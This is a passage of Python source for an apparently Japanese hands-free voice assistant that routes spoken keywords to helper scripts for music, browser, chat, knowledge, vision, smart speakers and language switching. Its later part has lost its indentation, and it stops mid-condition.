# Timestamped session log file, e.g. temp/_log/20240101-120000_<script>.log.
# (Name 'qLogFlie' is a historical typo kept because other code references it.)
qLogNow=datetime.datetime.now()
qLogFlie = 'temp/_log/' + qLogNow.strftime('%Y%m%d-%H%M%S') + '_' + os.path.basename(__file__) + '.log'
def qLogOutput(pLogText='', pDisplay=True, pOutfile=True):
    """Log *pLogText* to stdout and/or append it to the session log file.

    Args:
        pLogText: text to log (converted with str()).
        pDisplay: echo to stdout when True.
        pOutfile: append a line to the module-level qLogFlie when True.
    """
    # Removed the commented-out try/except scaffolding.
    if (pDisplay == True):
        print(str(pLogText))
    if (pOutfile == True):
        # BUG FIX: use a context manager so the handle is closed even if
        # the write raises (the original leaked the handle on error).
        with codecs.open(qLogFlie, 'a', 'utf-8') as w:
            w.write(str(pLogText) + '\n')
# Ensure the log directory exists, then record the log file's own path.
qMakeDirs('temp/_log/', False)
qLogOutput(qLogFlie, True, True)
def qGuide(tempFile=None, sync=True):
    """Play a short guide sound through the `sox` command line tool.

    Args:
        tempFile: mp3 file path, or one of the aliases '_up', '_ready',
                  '_accept', '_ok', '_ng', '_down', '_shutter';
                  None is a no-op.
        sync:     wait for playback to finish when True.
    """
    # BUG FIX: tempFile defaults to None, and os.path.exists(None) raises
    # TypeError; bail out early on None instead of crashing.
    if (tempFile is None):
        return
    # Map the symbolic aliases to their bundled sound files.
    aliases = {
        '_up': '_sound_up.mp3',
        '_ready': '_sound_ready.mp3',
        '_accept': '_sound_accept.mp3',
        '_ok': '_sound_ok.mp3',
        '_ng': '_sound_ng.mp3',
        '_down': '_sound_down.mp3',
        '_shutter': '_sound_shutter.mp3',
    }
    tempFile = aliases.get(tempFile, tempFile)
    if (os.path.exists(tempFile)):
        sox = subprocess.Popen(['sox', '-q', tempFile, '-d', ],
                               stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
        if (sync == True):
            sox.wait()
        sox.terminate()
        sox = None
def control_speech(seq, fileId, runMode, micDev, useApiTrn, useApiOut, inpLang, outLang, speechtext, sync=True):
    """Speak *speechtext* by delegating to the _speech_a3_all_api.py helper.

    Writes the text to a timestamped work file under qPathWork, then spawns
    the helper process configured for a text-to-speech-only pass (the
    input/translate stages get empty file arguments and playback flags are
    'off' — presumably the helper interprets these as "skip stage"; confirm
    against _speech_a3_all_api.py).

    Args:
        seq:        sequence tag embedded in the generated file names.
        fileId:     file identifier passed through to the helper.
        runMode:    run mode passed through to the helper.
        micDev:     microphone device passed through to the helper.
        useApiTrn:  translation API backend to use.
        useApiOut:  output (TTS) API backend to use.
        inpLang:    input language code.
        outLang:    output/translation language code.
        speechtext: text to write and have spoken.
        sync:       wait for the helper process to finish when True.
    """
    global qPathPlay
    global qPathWork
    global qBusyPlay
    xrunMode = runMode
    xApiInp = qApiInp
    xApiTrn = useApiTrn
    xApiOut = useApiOut
    xLangInp = inpLang
    xLangTrn = outLang
    xLangTxt = inpLang
    xLangOut = outLang
    #while qBusyCheck(qBusyPlay , 0) == 'busy':
    #    qLogOutput('wait')
    #    time.sleep(1)
    # NOTE(review): the `if (True):` blocks are scaffolding left from
    # previously conditional code.
    if (True):
        now=datetime.datetime.now()
        stamp=now.strftime('%Y%m%d-%H%M%S')
        wrkText = qPathWork + stamp + '.' + seq + '.control.txt'
        wrkOut = qPathPlay + stamp + '.' + seq + '.control.mp3'
        # Write the text the helper should speak; errors are ignored.
        try:
            w = codecs.open(wrkText, 'w', 'utf-8')
            w.write(speechtext)
            w.close()
            w = None
        except:
            w = None
    if (True):
        # Empty stage-file arguments and 'off' playback flags for the
        # non-TTS stages of the helper pipeline.
        inpInput = ''
        inpOutput= ''
        trnInput = ''
        trnOutput= ''
        txtInput = wrkText
        txtOutput= wrkOut
        outInput = ''
        outOutput= ''
        inpPlay = 'off'
        txtPlay = 'off'
        outPlay = 'off'
    if (True):
        api = subprocess.Popen(['python', '_speech_a3_all_api.py', \
            xrunMode, micDev, xApiInp, xApiTrn, xApiOut, xLangInp, xLangTrn, xLangTxt, xLangOut, \
            str(seq), fileId, inpInput, inpOutput, trnInput, trnOutput, txtInput, txtOutput, outInput, outOutput, \
            inpPlay, txtPlay, outPlay, ], \
            )
        if (sync == True):
            api.wait()
        api.terminate()
        api = None
# Process-wide state shared with control_sub(): handles of the auxiliary
# controller child processes (None while not running) and the AI-lock flag.
locked_ai = False
bgm_control = None
web_control = None
chatting_control = None
knowledge_control = None
vision_control = None
def control_sub(seq, fileId, runMode, micDev, cmdtxt, cmdLang, ):
global qOS
global qApiInp
global qApiTrn
global qApiOut
global qLangInp
global qLangTrn
global qLangTxt
global qLangOut
global qPathCtrl
global qPathInp
global qPathWav
global qPathSTT
global qPathTTS
global qPathTRA
global qPathPlay
global qPathRec
global qPathWork
global qBusyCtrl
global qBusyInput
global qBusySTT
global qBusyTTS
global qBusyPlay
global qCtrlBgm
global qCtrlWeb
global qCtrlChatting
global qCtrlKnowledge
global qCtrlVision
global locked_ai
global bgm_control
global web_control
global chatting_control
global knowledge_control
global vision_control
cmdtxt=cmdtxt.lower()
procText = cmdtxt
cmdBgm = ''
cmdWeb = ''
cmdChatting = ''
cmdKnowledge = ''
cmdVision = ''
if (runMode=='speech') or (runMode=='number'):
procText = ''
if (runMode=='translator') or (runMode=='learning'):
procText = ''
if (runMode=='knowledge'):
procText = ''
#if (runMode=='debug') or (runMode=='handsfree'):
if (procText != ''):
if (cmdLang == 'ja'):
if (procText == 'default' or procText == 'by default') \
or (procText == 'special') \
or (procText == 'google') \
or (procText == 'ibm') or (procText == 'watson') \
or (procText == 'microsoft' or procText == 'google' or procText == 'azur') \
or (procText == 'nict') or (procText == 'n i c t') \
or (procText == 'contest') or (procText == 'contests') \
or (procText == 'contesting possession') \
or (procText == 'presentation') \
or (procText == 'docomo') \
or (procText == 'winos') or (procText == 'windows') \
or (procText == 'macos') or (procText == 'osx') \
or (procText == 'audio stop') or (procText == 'voice stop') \
or (procText == 'ai lock') or (procText == 'api lock') \
or (procText == 'artificial intelligence fixation') \
or (procText == 'ai list') or (procText == 'api list') \
or (procText == 'ai test') or (procText == 'api test'):
procText = ''
if (procText == u'システム終了' or procText == u'バルス'):
cmdBgm = '_close_'
cmdWeb = '_close_'
cmdChatting = '_close_'
cmdKnowledge = '_close_'
cmdVision = '_close_'
if (cmdLang == 'en'):
if ((procText.find('play' )>=0) and (procText.find('list' )>=0)) \
or ((procText.find('play' )>=0) and (procText.find('start')>=0)) \
or ((procText.find('playlist' )>=0) and (procText.find('start')>=0)) \
or ((procText.find('play list')>=0) and (procText.find('start')>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('start')>=0)) \
or (procText == 'bgm') \
or (procText == 'garageband') \
or (procText == 'babymetal') \
or (procText == 'perfume') \
or (procText == 'kyary pamyu pamyu') \
or (procText == 'one ok rock' or procText == 'one ok') \
or (procText == 'the end of the world' or procText == 'end of the world'):
cmdBgm = '_open_'
if ((procText.find('playlist') >=0) and (procText.find('end' )>=0)) \
or ((procText.find('playlist') >=0) and (procText.find('stop' )>=0)) \
or ((procText.find('playlist') >=0) and (procText.find('close')>=0)) \
or ((procText.find('playlist') >=0) and (procText.find('exit' )>=0)) \
or ((procText.find('play list')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('play list')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('play list')>=0) and (procText.find('close')>=0)) \
or ((procText.find('play list')>=0) and (procText.find('exit' )>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('end' )>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('stop' )>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('close')>=0)) \
or ((procText.find('bgm') >=0) and (procText.find('exit' )>=0)):
cmdBgm = '_close_'
if ((procText.find('browser')>=0) and (procText.find('start')>=0)) \
or (procText == 'browser') \
or (procText == 'web browser') \
or (procText == 'periscope'):
cmdWeb = '_open_'
if ((procText.find('browser')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('browser')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('browser')>=0) and (procText.find('close')>=0)) \
or ((procText.find('browser')>=0) and (procText.find('exit' )>=0)):
cmdWeb = '_close_'
if ((procText.find('chat')>=0) and (procText.find('start')>=0)) \
or (procText == 'chat'):
cmdChatting = '_open_'
if ((procText.find('chat')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('chat')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('chat')>=0) and (procText.find('close')>=0)) \
or ((procText.find('chat')>=0) and (procText.find('exit' )>=0)):
cmdChatting = '_close_'
if ((procText.find('knowledge')>=0) and (procText.find('start')>=0)) \
or (procText == 'knowledge') \
or (procText == 'knowledge database'):
cmdKnowledge = '_open_'
if ((procText.find('knowledge')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('knowledge')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('knowledge')>=0) and (procText.find('close')>=0)) \
or ((procText.find('knowledge')>=0) and (procText.find('exit' )>=0)):
cmdKnowledge = '_close_'
if ((procText.find('image') >=0) and (procText.find('start')>=0)) \
or ((procText.find('vision')>=0) and (procText.find('start')>=0)) \
or (procText == 'image') \
or (procText == 'image control') \
or (procText == 'vision') \
or (procText == 'vision control'):
cmdVision = '_open_'
if ((procText.find('shutter')>=0) or (procText.find('photo')>=0)):
cmdVision = '_shutter_'
if ((procText == 'zoom') or (procText == 'zoom in')):
cmdVision = '_zoom_in_'
if ((procText == 'zoom out') or (procText == 'zoom off')):
cmdVision = '_zoom_out_'
if ((procText.find('image') >=0) and (procText.find('end' )>=0)) \
or ((procText.find('image') >=0) and (procText.find('stop' )>=0)) \
or ((procText.find('image') >=0) and (procText.find('close')>=0)) \
or ((procText.find('image') >=0) and (procText.find('exit' )>=0)) \
or ((procText.find('vision')>=0) and (procText.find('end' )>=0)) \
or ((procText.find('vision')>=0) and (procText.find('stop' )>=0)) \
or ((procText.find('vision')>=0) and (procText.find('close')>=0)) \
or ((procText.find('vision')>=0) and (procText.find('exit' )>=0)):
cmdVision = '_close_'
if (procText == 'reset'):
cmdBgm = '_close_'
cmdWeb = '_close_'
cmdChatting = '_close_'
cmdKnowledge = '_close_'
cmdVision = '_close_'
if (cmdBgm != '') \
or (cmdWeb != '') \
or (cmdChatting != '') \
or (cmdKnowledge != '') \
or (cmdVision != '') \
or (procText == 'default' or procText == 'by default') \
or (procText == 'special') \
or (procText == 'google') \
or (procText == 'ibm') or (procText == 'watson') \
or (procText == 'microsoft' or procText == 'google' or procText == 'azur') \
or (procText == 'nict') or (procText == 'n i c t') \
or (procText == 'contest') or (procText == 'contests') \
or (procText == 'contesting possession') \
or (procText == 'presentation') \
or (procText == 'docomo') \
or (procText == 'winos') or (procText == 'windows') \
or (procText == 'macos') or (procText == 'osx') \
or (procText == 'audio stop') or (procText == 'voice stop') \
or (procText == 'ai lock') or (procText == 'api lock') \
or (procText == 'artificial intelligence fixation') \
or (procText == 'ai list') or (procText == 'api list') \
or (procText == 'ai test') or (procText == 'api test') \
or (procText == u'言語は何ですか') or (procText == u'何語ですか') \
or (procText == u'日本語' and qLangOut != 'ja') \
or (procText == u'英語' and qLangOut != 'en') \
or (procText == u'アラビア語' and qLangOut != 'ar') \
or (procText == u'スペイン語' and qLangOut != 'es') \
or (procText == u'ドイツ語' and qLangOut != 'de') \
or (procText == u'フランス語' and qLangOut != 'fr') \
or (procText == u'イタリア語' and qLangOut != 'it') \
or (procText == u'ポルトガル語' and qLangOut != 'pt') \
or (procText == u'ロシア語' and qLangOut != 'ru') \
or (procText == u'トルコ語' and qLangOut != 'tr') \
or (procText == u'ウクライナ語' and qLangOut != 'uk') \
or (procText == u'インドネシア語' and qLangOut != 'id') \
or (procText == u'ミャンマー語' and qLangOut != 'my') \
or (procText == u'タイ語' and qLangOut != 'th') \
or (procText == u'ベトナム語' and qLangOut != 'vi') \
or (procText == u'中国語' and qLangOut != 'zh') \
or (procText == u'韓国語' and qLangOut != 'ko') \
or (procText == u'デモ紹介') or (procText == u'デモンストレーション') \
or (procText == u'自己紹介') or (procText == u'自己診断') \
or (procText == u'翻訳紹介') or (procText == u'翻訳診断') \
or (procText == u'連携紹介') or (procText == u'連携診断') \
or (procText == u'今何時') or (procText == u'今何時?') \
or (procText == u'現在地') or (procText == u'ここはどこ') \
or (procText == u'個人の予定') or (procText == u'個人のスケジュール') \
or (procText == u'会社の予定') or (procText == u'会社のスケジュール') \
or (procText == u'今日の予定') or (procText == u'今日のスケジュール') \
or (procText[-4:] == u'電話して' or procText[-5:] == u'ラインして') \
or (procText[-2:] == u'経路' or procText[-2:] == u'道順') \
or (procText[-2:] == u'時間' or procText[-2:] == u'時刻') \
or (procText[-3:] == u'調べて' or procText[-3:] == u'教えて') \
or (procText[-4:] == u'ニュース') \
or (procText[-3:] == u'の天気'):
qLogOutput(procText)
if (not bgm_control is None):
if (cmdBgm != ''):
try:
w = codecs.open(qCtrlBgm, 'w', 'shift_jis')
if (cmdBgm != '_close_'):
w.write(procText)
else:
w.write(cmdBgm)
w.close()
w = None
except:
w = None
if (not web_control is None):
if (cmdWeb != ''):
try:
print ('web control' + cmdWeb)
w = codecs.open(qCtrlWeb, 'w', 'shift_jis')
w.write(cmdWeb)
w.close()
w = None
except:
w = None
if (not chatting_control is None):
if (cmdChatting != ''):
try:
w = codecs.open(qCtrlChatting, 'w', 'shift_jis')
w.write(cmdChatting)
w.close()
w = None
except:
w = None
if (not knowledge_control is None):
if (cmdKnowledge != ''):
try:
w = codecs.open(qCtrlKnowledge, 'w', 'shift_jis')
w.write(cmdKnowledge)
w.close()
w = None
except:
w = None
if (not vision_control is None):
if (cmdVision != ''):
try:
w = codecs.open(qCtrlVision, 'w', 'shift_jis')
w.write(cmdVision)
w.close()
w = None
except:
w = None
else:
if (not web_control is None):
if (cmdLang == 'ja'):
try:
print ('web control' + procText)
w = codecs.open(qCtrlWeb, 'w', 'shift_jis')
w.write(procText)
w.close()
w = None
except:
w = None
if (not chatting_control is None):
if (cmdLang == 'ja'):
try:
w = codecs.open(qCtrlChatting, 'w', 'shift_jis')
w.write(procText)
w.close()
w = None
except:
w = None
if (not knowledge_control is None):
if (cmdLang == 'ja'):
try:
w = codecs.open(qCtrlKnowledge, 'w', 'shift_jis')
w.write(procText)
w.close()
w = None
except:
w = None
procText=''
if (procText != ''):
#time.sleep(2.00)
if (qBusyCheck(qBusyCtrl , 0) != 'busy'):
qBusySet(qBusyCtrl, True)
#qBusyCheck(qBusyCtrl , 3)
#qBusyCheck(qBusySTT , 3)
#qBusyCheck(qBusyTTS , 3)
qBusyCheck(qBusyPlay , 3)
if (micType == 'bluetooth') or (micGuide == 'on' or micGuide == 'sound'):
qBusyCheck(qBusyInput , 3)
if (cmdBgm == '_open_'):
if (bgm_control is None):
bgm_control = subprocess.Popen(['python', '_handsfree_bgm_control.py', runMode, qCtrlBgm, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#bgm_control.wait()
#bgm_control.terminate()
#bgm_control = None
if (cmdBgm == '_close_'):
if (not bgm_control is None):
bgm_control.wait()
bgm_control.terminate()
bgm_control = None
if (cmdWeb == '_open_'):
if (web_control is None):
web_control = subprocess.Popen(['python', '_handsfree_web_control.py', runMode, qCtrlWeb, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#web_control.wait()
#web_control.terminate()
#web_control = None
if (cmdWeb == '_close_'):
if (not web_control is None):
web_control.wait()
web_control.terminate()
web_control = None
if (cmdChatting == '_open_'):
if (chatting_control is None):
chatting_control = subprocess.Popen(['python', '_handsfree_chatting_control.py', runMode, qCtrlChatting, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#chatting_control.wait()
#chatting_control.terminate()
#chatting_control = None
if (cmdChatting == '_close_'):
if (not chatting_control is None):
chatting_control.wait()
chatting_control.terminate()
chatting_control = None
if (cmdKnowledge == '_open_'):
if (knowledge_control is None):
knowledge_control = subprocess.Popen(['python', '_handsfree_knowledge_control.py', runMode, qCtrlKnowledge, '', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#knowledge_control.wait()
#knowledge_control.terminate()
#knowledge_control = None
if (cmdKnowledge == '_close_'):
if (not knowledge_control is None):
knowledge_control.wait()
knowledge_control.terminate()
knowledge_control = None
if (cmdVision == '_open_'):
if (vision_control is None):
vision_control = subprocess.Popen(['python', '_vision_v3__capture.py', runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#vision_control.wait()
#vision_control.terminate()
#vision_control = None
if (cmdVision == '_close_'):
if (not vision_control is None):
vision_control.wait()
vision_control.terminate()
vision_control = None
if (procText == u'言語は何ですか') or (procText == u'何語ですか'):
speechtext = u'この翻訳機能は、'
speechtext += u'日本語、英語、アラビア語、スペイン語、ドイツ語、フランス語、'
speechtext += u'イタリア語、ポルトガル語、ロシア語、トルコ語、ウクライナ語、'
speechtext += u'インドネシア語、ミャンマー語、タイ語、ベトナム語、'
speechtext += u'中国語ならびに韓国語'
speechtext += u'に翻訳できます。あなたは何語を話しますか?'
speechtext += u'「konsan」にはシンプル英文メッセージでお願いします。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, 'en', speechtext, )
if (procText == u'日本語' and qLangOut != 'ja'):
qLangOut = 'ja'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'英語' and qLangOut != 'en'):
qLangOut = 'en'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'アラビア語' and qLangOut != 'ar'):
qLangOut = 'ar'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'スペイン語' and qLangOut != 'es'):
qLangOut = 'es'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ドイツ語' and qLangOut != 'de'):
qLangOut = 'de'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'フランス語' and qLangOut != 'fr'):
qLangOut = 'fr'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'イタリア語' and qLangOut != 'it'):
qLangOut = 'it'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ポルトガル語' and qLangOut != 'pt'):
qLangOut = 'pt'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ロシア語' and qLangOut != 'ru'):
qLangOut = 'ru'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'トルコ語' and qLangOut != 'tr'):
qLangOut = 'tr'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ウクライナ語' and qLangOut != 'uk'):
qLangOut = 'uk'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'インドネシア語' and qLangOut != 'id'):
qLangOut = 'id'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ミャンマー語' and qLangOut != 'my'):
qLangOut = 'my'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'タイ語' and qLangOut != 'th'):
qLangOut = 'th'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'ベトナム語' and qLangOut != 'vi'):
qLangOut = 'vi'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'中国語' and qLangOut != 'zh'):
qLangOut = 'zh'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'韓国語' and qLangOut != 'ko'):
qLangOut = 'ko'
qLangTrn = qLangOut
speechtext = u'音声言語を、' + cmdtxt + u'に切り替えました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == u'デモ紹介') or (procText == u'デモンストレーション'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, u'demo', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'自己紹介') or (procText == u'自己診断'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, 'all', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'翻訳紹介') or (procText == u'翻訳診断'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, u'翻訳', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'ハンズフリー紹介') or (procText == u'ハンズフリー診断'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, u'ハンズフリー', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'連携紹介') or (procText == u'連携診断'):
selfcheck = subprocess.Popen(['python', '_handsfree_self_check.py', runMode, u'連携', ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#selfcheck.wait()
#selfcheck.terminate()
#selfcheck = None
if (procText == u'今何時') or (procText == u'今何時?'):
#now2=datetime.datetime.now()
#speechtext = u'日本の現在の時刻は、'
#speechtext += now2.strftime('%H') + u'時'
#speechtext += now2.strftime('%M') + u'分です'
#control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'ja,hoya,今なんじ?'
if (qApiOut == 'google'):
smart = 'alexa'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
elif (qApiOut == 'free' or qApiOut == 'winos'):
smart = 'clova'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
else:
smart = 'google'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText == u'現在地') or (procText == u'ここはどこ'):
speechtext = 'ja,hoya,' + procText + '?'
smart = 'siri'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText == u'会社の予定') or (procText == u'会社のスケジュール') \
or (procText == u'今日の予定') or (procText == u'今日のスケジュール'):
speechtext = u'ja,hoya,今日の予定教えて?'
smart = 'alexa'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText == u'今日の予定') or (procText == u'今日のスケジュール'):
time.sleep(10.00)
if (procText == u'個人の予定') or (procText == u'個人のスケジュール') \
or (procText == u'今日の予定') or (procText == u'今日のスケジュール'):
speechtext = u'ja,hoya,今日の予定教えて?'
smart = 'google'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText[-4:] == u'電話して' or procText[-5:] == u'ラインして'):
speechtext = 'ja,hoya,' + procText + '。'
smart = 'clova'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText[-2:] == u'経路' or procText[-2:] == u'道順'):
speechtext = 'ja,hoya,' + procText + '。'
smart = 'siri'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText[-2:] == u'時間' or procText[-2:] == u'時刻'):
speechtext = 'ja,hoya,' + procText + '。'
smart = 'auto'
smtspk= subprocess.Popen(['python', '_handsfree_smart_speaker.py', runMode, speechtext, smart, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
smtspk.wait()
smtspk.terminate()
smtspk = None
if (procText[-3:] == u'調べて' or procText[-3:] == u'教えて'):
speechtext = procText + '?'
knowledge_onece = subprocess.Popen(['python', '_handsfree_knowledge_control.py', runMode, '', speechtext, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
knowledge_onece.wait()
knowledge_onece.terminate()
knowledge_onece = None
if (procText[-4:] == u'ニュース'):
rss = subprocess.Popen(['python', '_handsfree_rss_search.py', runMode, procText, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#rss.wait()
#rss.terminate()
#rss = None
if (procText[-3:] == u'の天気'):
weather = subprocess.Popen(['python', '_handsfree_weather_search.py', runMode, procText[:-3], ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#weather.wait()
#weather.terminate()
#weather = None
if (procText == 'ai lock') or (procText == 'api lock') \
or (procText == 'artificial intelligence fixation'):
locked_ai = True
speechtext = u'ja,hoya,クラウドAIの切り替えをロックします。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'クラウドAIの切り替えをロックしました。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'再起動以外解除できません。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'ai list') or (procText == 'api list'):
speechtext = u'ja,hoya,利用可能なAIをお知らせします。'
control_speech('00', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'現在利用可能なクラウドAIは、次の通りです。'
control_speech('01', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'グーグルクラウドプラットホームのAI。'
control_speech('02', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'IBMのクラウドAI「WATSON」。'
control_speech('03', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'マイクロソフトのクラウドAI「azure」。'
control_speech('04', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'国立法人の情報通信研究機構「NICT」のクラウドAI。'
control_speech('05', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'携帯電話会社「ドコモ」の音声認識機能、雑談会話機能、知識データベース検索機能。'
control_speech('06', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'「HOYA」の音声合成機能。'
control_speech('07', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'また、場合により外部スマートスピーカー、iPhoneとも連携できます。'
control_speech('08', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
speechtext = u'クラウドAIを切り替えしますか?'
control_speech('99', fileId, runMode, micDev, qApiTrn, qApiOut, qLangInp, qLangOut, speechtext, )
if (procText == 'default' or procText == 'by default') and (locked_ai == False):
if (qApiInp == 'free') and (qApiTrn == 'free') \
and (qApiOut == 'free' or qApiOut == 'winos' or qApiOut == 'macos') \
and (qLangOut == 'en') and (qLangTrn[:2] == qLangOut):
